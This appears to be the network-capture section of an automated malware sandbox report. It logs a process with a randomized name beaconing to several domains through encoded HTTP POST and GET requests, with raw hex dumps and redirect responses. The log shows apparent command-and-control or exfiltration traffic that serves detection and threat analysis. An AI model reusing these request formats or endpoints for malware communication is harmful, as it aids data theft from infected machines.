5	192.168.2.6	50022	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:43.575553894 CET	792	OUT	POST /lbm4/ HTTP/1.1 Host: www.wiretap.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.wiretap.digital Referer: http://www.wiretap.digital/lbm4/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 57 34 69 47 74 33 58 74 45 57 66 57 47 4a 70 72 56 50 63 4d 73 50 71 6c 33 78 4c 34 31 66 72 66 6e 6a 46 72 53 37 4d 30 35 6d 2f 76 6f 62 45 41 52 4f 68 72 30 4a 6d 76 42 45 38 66 62 75 79 34 65 51 65 6a 75 54 56 51 33 6e 77 71 4a 36 46 48 62 53 44 31 50 73 46 41 75 2f 6a 69 34 4d 44 57 37 41 50 34 66 44 77 30 39 78 61 36 54 70 72 50 74 56 78 66 38 70 75 4e 47 71 74 6d 4c 77 48 4e 63 4d 32 50 56 54 39 68 2f 47 6c 71 38 47 62 57 74 55 4d 38 6c 4d 4a 62 6a 69 62 6e 4d 53 41 75 54 45 38 37 75 49 38 30 34 38 6a 4f 74 53 39 36 64 49 69 6e 6d 65 31 4d 50 44 78 43 71 31 56 35 77 48 67 65 62 6d 55 51 64 36 6d 76 Data Ascii: 0dfXG=W4iGt3XtEWfWGJprVPcMsPql3xL41frfnjFrS7M05m/vobEAROhr0JmvBE8fbuy4eQejuTVQ3nwqJ6FHbSD1PsFAu/ji4MDW7AP4fDw09xa6TprPtVxf8puNGqtmLwHNcM2PVT9h/Glq8GbWtUM8lMJbjibnMSAuTE87uI8048jOtS96dIinme1MPDxCq1V5wHgebmUQd6mv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	50023	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:46.247091055 CET	816	OUT	POST /lbm4/ HTTP/1.1 Host: www.wiretap.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.wiretap.digital Referer: http://www.wiretap.digital/lbm4/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 57 34 69 47 74 33 58 74 45 57 66 57 48 6f 5a 72 51 6f 41 4d 70 76 71 36 72 68 4c 34 6a 76 71 57 6e 6a 4a 72 53 2f 31 72 35 53 54 76 6f 35 73 41 41 37 4e 72 68 4a 6d 76 5a 55 39 55 55 4f 79 78 65 51 61 42 75 52 52 51 33 6a 59 71 4a 37 56 48 59 68 62 36 4e 38 46 56 33 76 6a 61 33 73 44 57 37 41 50 34 66 48 51 61 39 78 43 36 54 34 37 50 74 77 4e 51 78 4a 75 4b 46 71 74 6d 41 51 48 42 63 4d 32 39 56 58 63 45 2f 46 64 71 38 44 66 57 38 68 77 37 76 4d 49 78 6e 69 61 6f 4b 58 73 6a 64 79 78 4b 67 4c 35 59 37 73 6e 49 73 6b 38 67 42 37 69 45 30 4f 56 4f 50 42 70 77 71 56 56 54 79 48 59 65 4a 78 59 33 53 4f 44 4d 34 6c 7a 66 52 37 4c 30 62 64 2f 35 48 33 4d 67 54 31 65 38 48 51 3d 3d Data Ascii: 0dfXG=W4iGt3XtEWfWHoZrQoAMpvq6rhL4jvqWnjJrS/1r5STvo5sAA7NrhJmvZU9UUOyxeQaBuRRQ3jYqJ7VHYhb6N8FV3vja3sDW7AP4fHQa9xC6T47PtwNQxJuKFqtmAQHBcM29VXcE/Fdq8DfW8hw7vMIxniaoKXsjdyxKgL5Y7snIsk8gB7iE0OVOPBpwqVVTyHYeJxY3SODM4lzfR7L0bd/5H3MgT1e8HQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	50024	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:48.914824009 CET	1829	OUT	POST /lbm4/ HTTP/1.1 Host: www.wiretap.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 1246 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.wiretap.digital Referer: http://www.wiretap.digital/lbm4/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 57 34 69 47 74 33 58 74 45 57 66 57 48 6f 5a 72 51 6f 41 4d 70 76 71 36 72 68 4c 34 6a 76 71 57 6e 6a 4a 72 53 2f 31 72 35 53 62 76 70 49 4d 41 52 6f 31 72 7a 35 6d 76 48 45 38 54 55 4f 7a 7a 65 57 79 46 75 52 64 41 33 68 51 71 49 63 56 48 64 51 62 36 48 38 46 56 71 2f 6a 68 34 4d 44 44 37 41 66 30 66 44 38 61 39 78 43 36 54 37 7a 50 72 6c 78 51 7a 4a 75 4e 47 71 74 36 4c 77 48 74 63 4d 75 74 56 58 59 36 38 31 39 71 2f 6a 50 57 76 33 6b 37 31 4d 49 7a 67 69 62 33 4b 58 70 6a 64 30 55 6d 67 49 6b 46 37 72 76 49 74 6a 46 2f 62 50 6d 6d 32 75 35 68 55 77 42 4a 72 67 74 61 37 32 64 6c 4a 6a 55 4c 4d 4d 62 6f 37 7a 7a 30 46 62 43 76 4d 4e 66 70 44 78 70 41 56 56 58 41 48 4d 31 6e 4b 46 77 38 56 31 54 30 43 67 35 6e 4b 53 32 75 32 69 6f 33 36 77 63 55 7a 6d 31 57 72 71 56 49 2b 31 50 2b 4f 74 54 56 7a 68 52 4b 75 49 6c 72 6a 5a 73 65 4f 67 68 7a 65 51 7a 6d 54 68 74 46 56 4f 4f 37 42 4b 46 31 74 66 64 67 6f 78 37 49 30 5a 66 74 49 45 45 79 53 34 73 56 35 73 50 4f 67 71 50 50 6c 6b 31 76 [TRUNCATED] Data Ascii: 0dfXG=W4iGt3XtEWfWHoZrQoAMpvq6rhL4jvqWnjJrS/1r5SbvpIMARo1rz5mvHE8TUOzzeWyFuRdA3hQqIcVHdQb6H8FVq/jh4MDD7Af0fD8a9xC6T7zPrlxQzJuNGqt6LwHtcMutVXY6819q/jPWv3k71MIzgib3KXpjd0UmgIkF7rvItjF/bPmm2u5hUwBJrgta72dlJjULMMbo7zz0FbCvMNfpDxpAVVXAHM1nKFw8V1T0Cg5nKS2u2io36wcUzm1WrqVI+1P+OtTVzhRKuIlrjZseOghzeQzmThtFVOO7BKF1tfdgox7I0ZftIEEyS4sV5sPOgqPPlk1voUDpsQvMsJ/2RC4fwflqYyDquBPrExxCNkjAZS8RyclHsczR+UbbXxoco1Kv5RwLfLfXqg8UsEHwxLm0g62V1FPZuesMDhm9XBUqouTWSzWjhQGUy/Kpf2aWKkoOYT/m0P87BNntryohjEVQwM2q2RUhik8U+VugQH306wAoavitjXGaJKN3o8M+E2XMzUR4RuDPFrh/AA3cK04QnExxnUdLQutSiGJ9rxuLsIqzG8g+NLtH5zjqJLWAO1qbz+VKJ5AAsPJTy5n9e1KsMhmPW3uzzdvQK2pzP96x0nyimKWbuMLeuZEcfYQwXPcdsTTGcBZy8tq7heyvB7wqfEcByY4D6zvDxcNdvmK5+kHJWB611oAToyrJWNSzcpnYy+Lx+9pBcLH6DQVrukPlnJmjjPtEr7lFzEn5pXBaTXuYbzOnLWRK722mSaS26WQJhk1sAWPmip6H3p6YYzrfDESoD0EEc1KTP7hNTVr4h9OyHdTs85AbxDr8XUwelQNH9BnOy61D+QGe5QFxN5d48Hf89XdD3gGD56ofXL+CHiYEcfdCI9V5decqVGf0KBbA024MsZ+Hcy0hdC3+o8IC0oHtEo587foZLR6ohcWMzfrpwHET3HHj0JQwQNuNAb97aiBGq9Ym455hGUWtb69Zj222Ux/iWhh4I9aSsN [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	50025	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:51.564704895 CET	528	OUT	GET /lbm4/?0dfXG=b6KmuAKoHDfmH6wBa4Iuhs+4qAfci8KJxStQSrt0xRWxrI04LbR2sZmSZHliQZPsTEeCyhZmzit1d7xvCBPKA7cM2dH3/rnJzTWpKXRa2CCyGb+HtjdcybjYJ406KzLAcPDnEDo=&U0W=7ROlj HTTP/1.1 Host: www.wiretap.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Nov 25, 2024 13:56:52.702435970 CET	407	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 25 Nov 2024 12:56:52 GMT Content-Type: text/html Content-Length: 267 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 64 66 58 47 3d 62 36 4b 6d 75 41 4b 6f 48 44 66 6d 48 36 77 42 61 34 49 75 68 73 2b 34 71 41 66 63 69 38 4b 4a 78 53 74 51 53 72 74 30 78 52 57 78 72 49 30 34 4c 62 52 32 73 5a 6d 53 5a 48 6c 69 51 5a 50 73 54 45 65 43 79 68 5a 6d 7a 69 74 31 64 37 78 76 43 42 50 4b 41 37 63 4d 32 64 48 33 2f 72 6e 4a 7a 54 57 70 4b 58 52 61 32 43 43 79 47 62 2b 48 74 6a 64 63 79 62 6a 59 4a 34 30 36 4b 7a 4c 41 63 50 44 6e 45 44 6f 3d 26 55 30 57 3d 37 52 4f 6c 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0dfXG=b6KmuAKoHDfmH6wBa4Iuhs+4qAfci8KJxStQSrt0xRWxrI04LbR2sZmSZHliQZPsTEeCyhZmzit1d7xvCBPKA7cM2dH3/rnJzTWpKXRa2CCyGb+HtjdcybjYJ406KzLAcPDnEDo=&U0W=7ROlj"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	50026	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:06.765336990 CET	810	OUT	POST /bpal/ HTTP/1.1 Host: www.impulsarnegocios.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.impulsarnegocios.info Referer: http://www.impulsarnegocios.info/bpal/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 59 4f 49 31 4e 74 6e 49 38 30 47 6b 53 66 32 45 69 75 72 50 30 30 43 2b 31 4a 46 68 76 6f 76 79 43 55 65 47 36 58 41 37 42 4a 50 67 7a 4f 76 7a 45 50 71 69 79 31 64 55 46 56 2f 53 63 47 5a 52 4e 59 4b 4c 62 34 77 4e 4c 69 48 66 62 65 65 4f 63 44 45 6e 53 53 56 4f 5a 38 52 32 45 41 36 77 49 4a 39 4f 4b 6a 52 52 31 55 54 59 72 5a 31 4d 77 6a 75 44 57 47 71 74 69 68 4b 58 79 78 61 71 58 74 43 53 53 54 71 4a 34 61 4e 69 73 47 51 63 78 6d 4b 73 4d 67 4c 4f 4e 59 6a 49 74 65 74 33 30 5a 58 75 76 5a 4e 6b 47 69 75 71 49 34 51 74 36 41 56 48 6d 61 50 58 33 35 64 38 35 6a 64 30 72 37 4e 38 6f 6c 54 7a 4b 36 50 41 Data Ascii: 0dfXG=YOI1NtnI80GkSf2EiurP00C+1JFhvovyCUeG6XA7BJPgzOvzEPqiy1dUFV/ScGZRNYKLb4wNLiHfbeeOcDEnSSVOZ8R2EA6wIJ9OKjRR1UTYrZ1MwjuDWGqtihKXyxaqXtCSSTqJ4aNisGQcxmKsMgLONYjItet30ZXuvZNkGiuqI4Qt6AVHmaPX35d85jd0r7N8olTzK6PA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	50027	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:09.444659948 CET	834	OUT	POST /bpal/ HTTP/1.1 Host: www.impulsarnegocios.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.impulsarnegocios.info Referer: http://www.impulsarnegocios.info/bpal/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 59 4f 49 31 4e 74 6e 49 38 30 47 6b 52 2b 47 45 6b 39 7a 50 31 55 43 68 73 4a 46 68 67 49 76 32 43 55 53 47 36 53 67 56 42 37 62 67 7a 75 66 7a 46 4f 71 69 7a 31 64 55 64 6c 2f 58 45 6d 59 38 4e 66 44 2b 62 35 38 4e 4c 6a 6a 66 62 66 75 4f 64 77 63 6b 53 43 56 4d 55 63 52 6f 41 41 36 77 49 4a 39 4f 4b 6a 45 30 31 55 37 59 72 4d 39 4d 77 47 61 41 56 47 71 71 72 42 4b 58 6b 42 61 75 58 74 43 37 53 53 33 65 34 59 46 69 73 44 73 63 78 33 4b 76 48 67 4c 4d 51 49 6a 47 38 65 42 37 7a 5a 58 73 32 50 52 49 57 54 33 51 41 75 52 33 6d 7a 56 6b 30 4b 76 56 33 37 46 4f 35 44 64 65 70 37 31 38 36 79 66 55 46 4f 71 6a 56 77 6d 6f 54 33 57 7a 4a 2f 73 2b 46 56 6f 78 58 51 41 51 48 77 3d 3d Data Ascii: 0dfXG=YOI1NtnI80GkR+GEk9zP1UChsJFhgIv2CUSG6SgVB7bgzufzFOqiz1dUdl/XEmY8NfD+b58NLjjfbfuOdwckSCVMUcRoAA6wIJ9OKjE01U7YrM9MwGaAVGqqrBKXkBauXtC7SS3e4YFisDscx3KvHgLMQIjG8eB7zZXs2PRIWT3QAuR3mzVk0KvV37FO5Ddep7186yfUFOqjVwmoT3WzJ/s+FVoxXQAQHw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	50028	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:12.109241962 CET	1847	OUT	POST /bpal/ HTTP/1.1 Host: www.impulsarnegocios.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 1246 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.impulsarnegocios.info Referer: http://www.impulsarnegocios.info/bpal/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 59 4f 49 31 4e 74 6e 49 38 30 47 6b 52 2b 47 45 6b 39 7a 50 31 55 43 68 73 4a 46 68 67 49 76 32 43 55 53 47 36 53 67 56 42 37 44 67 7a 64 58 7a 46 74 43 69 30 31 64 55 44 56 2f 57 45 6d 5a 2b 4e 5a 71 32 62 35 42 32 4c 67 4c 66 4a 70 36 4f 61 42 63 6b 4c 79 56 4d 64 38 52 31 45 41 37 79 49 49 52 43 4b 6a 55 30 31 55 37 59 72 4e 4e 4d 33 54 75 41 5a 6d 71 74 69 68 4b 68 79 78 62 78 58 74 71 42 53 53 69 6a 35 6f 6c 69 73 69 63 63 32 46 69 76 4b 67 4c 53 54 49 69 41 38 65 4d 6c 7a 5a 4b 54 32 50 4e 69 57 52 72 51 52 4a 6b 51 2f 69 39 47 6a 37 33 72 32 5a 5a 6f 6e 44 5a 35 7a 62 78 76 78 52 2f 54 4b 36 36 6a 62 45 57 46 59 52 58 38 4b 74 59 71 62 53 78 2b 54 44 46 37 48 78 33 59 4d 31 38 63 2f 77 69 57 6d 4e 4d 38 30 44 77 34 65 73 71 41 58 4f 78 76 56 76 32 37 52 48 54 51 59 45 7a 69 6b 32 43 55 4c 48 44 38 49 64 62 64 51 67 2b 70 62 50 6e 47 52 32 31 42 37 48 62 48 33 63 4d 42 6a 72 7a 56 41 64 6d 4e 6c 43 66 31 47 6d 51 62 4d 33 6b 75 72 79 52 43 70 63 6d 4b 32 31 62 56 49 6a 64 55 [TRUNCATED] Data Ascii: 0dfXG=YOI1NtnI80GkR+GEk9zP1UChsJFhgIv2CUSG6SgVB7DgzdXzFtCi01dUDV/WEmZ+NZq2b5B2LgLfJp6OaBckLyVMd8R1EA7yIIRCKjU01U7YrNNM3TuAZmqtihKhyxbxXtqBSSij5olisicc2FivKgLSTIiA8eMlzZKT2PNiWRrQRJkQ/i9Gj73r2ZZonDZ5zbxvxR/TK66jbEWFYRX8KtYqbSx+TDF7Hx3YM18c/wiWmNM80Dw4esqAXOxvVv27RHTQYEzik2CULHD8IdbdQg+pbPnGR21B7HbH3cMBjrzVAdmNlCf1GmQbM3kuryRCpcmK21bVIjdUPRfgYQmX1sg/PHCnumz9koGaktJ3ozf9A2L4y4Jl2d/n1X/DLKHJ0+uRFO+xI28Iw6mGT4bprKtmSw02nnqnhuNeX/42ChJylCl32xNhtZEPxOjDyVduOM7uicBNAktMdF8nxlI7IT+IrcBpYBHt2w6K0rPdYHKcUXhPvuBEc2PzjFHL+ZpqvHIV/I5uegXT42BKpEAkBzCQrQHnGWuL1IMBZdkF4zJINUTre6nAWnShVtWQV4sbgYFuDNsJzAD8wydB0pEf86f2B/TML40y+osnxjU4bI4iU1hRwFOUI8Nbxkb+YJGBnJd5IZPPkrupD+1JfmSS3o294IBey5MLVgoi70lqg4JjSbPB+QOVMwa1r8Fm09K1CCIiuwDsEKMK210Qm9oHS2s4j/ZKhQLHesbdgU3oNIjcVfVFYhN5eM5tx5GkYHaw80QVZbsYBupFQH4c5Gg7VRthITRkjVAlzgnTY6hpkC5oR0O0Ci1VuAkQ9pA3F3DwcNwZ+pZE1sfYtEWMrYjjEKEpqtUM/XWQ7jFzNHx9/Vh73SWsfVdgj8bz3BYFuf3BzrN/ZuaaOwD7p/z1EyPTp6SY3M8Nx36HhNhVUq2OQ2o3m540vJ+fPmyJ6zSxz9uADqXrTZXPPpQD0ltvnCPE36SJESW/mdoCFLvOJhUaji9OI4 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	50029	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:14.770536900 CET	534	OUT	GET /bpal/?0dfXG=VMgVOaCh3mm+GdPlwv+P/XKcyqoSqp/AEn6p1isqCLPz7ObQC9Sqz3hudnfRRQZjENudSaBoMynPI/uiESQeR0wcE+BMO0b1K91MeQYvtVLH9vcXww6dd1bPq3nzmSOiSfDHfUE=&U0W=7ROlj HTTP/1.1 Host: www.impulsarnegocios.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Nov 25, 2024 13:57:15.953053951 CET	407	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 25 Nov 2024 12:57:15 GMT Content-Type: text/html Content-Length: 267 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 64 66 58 47 3d 56 4d 67 56 4f 61 43 68 33 6d 6d 2b 47 64 50 6c 77 76 2b 50 2f 58 4b 63 79 71 6f 53 71 70 2f 41 45 6e 36 70 31 69 73 71 43 4c 50 7a 37 4f 62 51 43 39 53 71 7a 33 68 75 64 6e 66 52 52 51 5a 6a 45 4e 75 64 53 61 42 6f 4d 79 6e 50 49 2f 75 69 45 53 51 65 52 30 77 63 45 2b 42 4d 4f 30 62 31 4b 39 31 4d 65 51 59 76 74 56 4c 48 39 76 63 58 77 77 36 64 64 31 62 50 71 33 6e 7a 6d 53 4f 69 53 66 44 48 66 55 45 3d 26 55 30 57 3d 37 52 4f 6c 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0dfXG=VMgVOaCh3mm+GdPlwv+P/XKcyqoSqp/AEn6p1isqCLPz7ObQC9Sqz3hudnfRRQZjENudSaBoMynPI/uiESQeR0wcE+BMO0b1K91MeQYvtVLH9vcXww6dd1bPq3nzmSOiSfDHfUE=&U0W=7ROlj"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	50030	217.160.0.158	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:22.086493969 CET	789	OUT	POST /bruv/ HTTP/1.1 Host: www.accupower.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.accupower.tech Referer: http://www.accupower.tech/bruv/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 72 2b 6f 4d 76 33 56 69 72 6e 51 4b 78 61 62 36 41 78 6d 62 67 7a 78 63 33 6d 34 57 64 43 74 69 79 37 64 49 2b 49 47 4c 2f 65 6b 37 7a 79 36 77 59 76 61 50 77 31 6d 6c 57 53 4b 56 76 46 30 34 4d 4d 4a 73 5a 61 63 51 58 74 6f 39 39 6b 4d 4d 52 30 64 53 39 52 4a 71 5a 66 45 39 51 68 64 55 55 2b 6f 6d 4a 53 73 67 37 54 79 52 35 31 58 71 39 2b 6a 56 4c 46 6b 55 70 53 54 6e 4d 6d 4b 37 68 47 58 70 69 53 76 64 45 45 73 36 61 64 7a 70 50 49 53 61 34 73 34 6e 7a 67 45 52 68 48 79 2f 4d 38 64 2b 65 41 61 64 64 55 4e 77 4f 2b 31 31 7a 50 51 63 43 50 54 48 47 76 67 6d 76 43 77 56 53 75 38 2f 4d 35 76 38 39 6b 52 76 Data Ascii: 0dfXG=r+oMv3VirnQKxab6Axmbgzxc3m4WdCtiy7dI+IGL/ek7zy6wYvaPw1mlWSKVvF04MMJsZacQXto99kMMR0dS9RJqZfE9QhdUU+omJSsg7TyR51Xq9+jVLFkUpSTnMmK7hGXpiSvdEEs6adzpPISa4s4nzgERhHy/M8d+eAaddUNwO+11zPQcCPTHGvgmvCwVSu8/M5v89kRv
Nov 25, 2024 13:57:23.395997047 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 25 Nov 2024 12:57:23 GMT Server: Apache Content-Encoding: gzip Data Raw: 33 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bc e9 b2 db 48 92 2e f8 ff 3e 85 6e 95 dd a9 ee 42 2a b1 6f d2 ad 6b 03 12 24 40 12 1b 41 10 5b 5b db 18 f6 7d df 91 a6 77 9f e0 d1 92 52 65 56 57 4d f7 f4 bf 3a d2 91 48 20 e0 b1 79 78 84 7f fe 39 fe 77 3a 56 e5 ff f9 1f ef c0 cf ff 4e 23 2f fc fc f1 ed eb 98 8d 65 f4 7f bc 20 98 da 66 89 fa 9f c7 28 48 df bd 7f 57 46 d9 30 4e 75 32 c4 ff d7 1f 31 8c f9 98 66 49 f4 ee e0 8d 63 d4 67 d1 b0 0d 63 54 45 a0 58 56 c7 cd ff fd e3 c3 ff 1b fe 2c f2 ad b6 b7 2a aa 68 f4 de a5 e3 d8 be 8f ba 29 9b ff f2 87 63 53 8f 51 3d be 37 b6 36 fa c3 bb e0 f3 b7 bf fc 61 8c d6 11 7e b5 f4 e3 bb 20 f5 fa 21 1a ff 32 8d f1 7b e6 0f f0 77 ed 1d c6 0d b4 f7 9b f0 57 05 f0 9f ff e7 bb ba e9 2b af cc f6 e8 e7 60 18 de 61 08 8a bd 47 c0 5f da 40 b1 0f 38 fd ee 69 1c 41 6b 5f 6d f8 00 c3 49 36 a6 93 ff 73 d0 54 70 1d 05 4d e9 0d f0 8f 8f ff 19 f6 fa 31 0b ca e8 27 6f c8 c2 e8 a7 10 74 20 2b 87 9f e2 2c 09 bc 76 cc 9a fa f5 71 ea a3 9f e2 a6 01 23 f2 d3 6b 4c 5f ff 25 7d 33 b5 [TRUNCATED] Data Ascii: 300aH.>nBok$@A[[}wReVWM:H yx9w:VN#/e f(HWF0Nu21fIcgcTEXV,h)cSQ=76a~ !2{wW+`aG_@8iAk_mI6sTpM1'ot +,vq#kL_%}3?o~%~'ogoiU4durW?you3FoOfaG`>>_"i%'G0YN#tKGbhOo0IV@>y&_i\|f{i3>x`8[!S~,>~3EG;p>3]\\wwH +K7A}_W)f"A__Gi\'-Q)OoM@Rk\|FBO`_\|/(^ZG?X4xUYZ/)]-[)aTeI1z&_zzV}?O\|<b\|h}&0pL?:m?Q#Q`/={`%]_y)K8Wi@S~{y^fuzo [TRUNCATED]
Nov 25, 2024 13:57:23.396025896 CET	1236	IN	Data Raw: 7f 79 ad cd b8 6c 96 0f 9f 6d cd a7 cf 46 f1 5b ab 3f 81 59 a8 be fb 96 45 65 08 8c fa d7 da 5e da 3d 34 65 16 be fb 63 80 bc fe 7c fc 6a 13 de 61 ed fa f1 6b f7 7e c6 c1 38 bd fb 99 7a 0d d7 bb 9f 5f 2b e8 53 19 25 51 1d 7e 95 03 26 e4 eb 48 fc Data Ascii: ylmF[?YEe^=4ec\|jak~8z_+S%Q~&H3m?{,o~5_j+`v:DE}>6}/?Oo>#WUK0Xm6e{u&<!J};boO)H{`Sw
